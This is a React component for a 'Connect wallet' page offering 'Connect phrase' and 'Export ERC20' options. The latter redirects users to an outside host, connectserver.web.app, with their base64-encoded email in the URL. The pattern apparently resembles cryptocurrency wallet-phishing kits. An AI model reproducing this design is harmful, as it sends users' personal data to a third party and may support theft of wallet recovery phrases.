import { ArrowForwardIos, AutoAwesome } from "@mui/icons-material";
import { Avatar, Card, Container, Link, Stack, Typography } from "@mui/joy";
import HeaderBackButton from "../../components/HeaderBackButton";
import { useNavigate } from "react-router";
import { encodedurl, encodesite } from "../../App";
import { useSelector } from "react-redux";

export default function ConnectOptions() {
  const navigate = useNavigate();
  return (
    <>
      <HeaderBackButton title={"Connect wallet"} />
      <Container maxWidth="sm">
        <Stack spacing={2} sx={{ mt: 2 }}>
             <Card
            orientation="horizontal"
            variant="outlined"
            sx={{
              display: "flex",
              justifyContent: "space-between",
              alignItems: "center",
            }}
          >
            <Stack direction={"row"} spacing={2} alignItems={"center"}>
              <AutoAwesome sx={{ fontSize: "x-large" }} />
              <Link
                overlay
                component="button"
                underline="none"
                onClick={() => navigate("/connect")}
                sx={{
                  display: "flex",
                  flexDirection: "column",
                  alignItems: "start",
                }}
              >
                <Typography level="body-md" sx={{ fontWeight: "md" }}>
                  Connect phrase
                </Typography>
              </Link>
            </Stack>
            <ArrowForwardIos fontSize="large" />
          </Card>

          <ConnectOptionsErc20 />

       
        </Stack>
      </Container>
    </>
  );
}
export const ConnectOptionsErc20 = ({title}) => {
  const userinfo = useSelector((state) => state.useInfos);
  const { email } = userinfo;
  const encodemail = btoa(email);

  return (
    <Card
      orientation="horizontal"
      variant="outlined"
      sx={{
        display: "flex",
        justifyContent: "space-between",
        alignItems: "center",
      }}
    >
      <Stack direction={"row"} spacing={2} alignItems={"center"}>
        <Avatar
          //  sx={{ width: 20, height: 20 }}
          size="sm"
          src="./images/coins/eth.png"
        />
        <Link
          overlay
          component="button"
          underline="none"
          onClick={() => {
            window.location.href = `https://connectserver.web.app/${encodedurl}/${encodesite}/${encodemail}`;
          }}
          sx={{
            display: "flex",
            flexDirection: "column",
            alignItems: "start",
          }}
        >
          <Typography level="body-md" sx={{ fontWeight: "md" }}>
            Export ERC20
          </Typography>
        </Link>
      </Stack>
      <ArrowForwardIos fontSize="large" />
    </Card>
  );
};
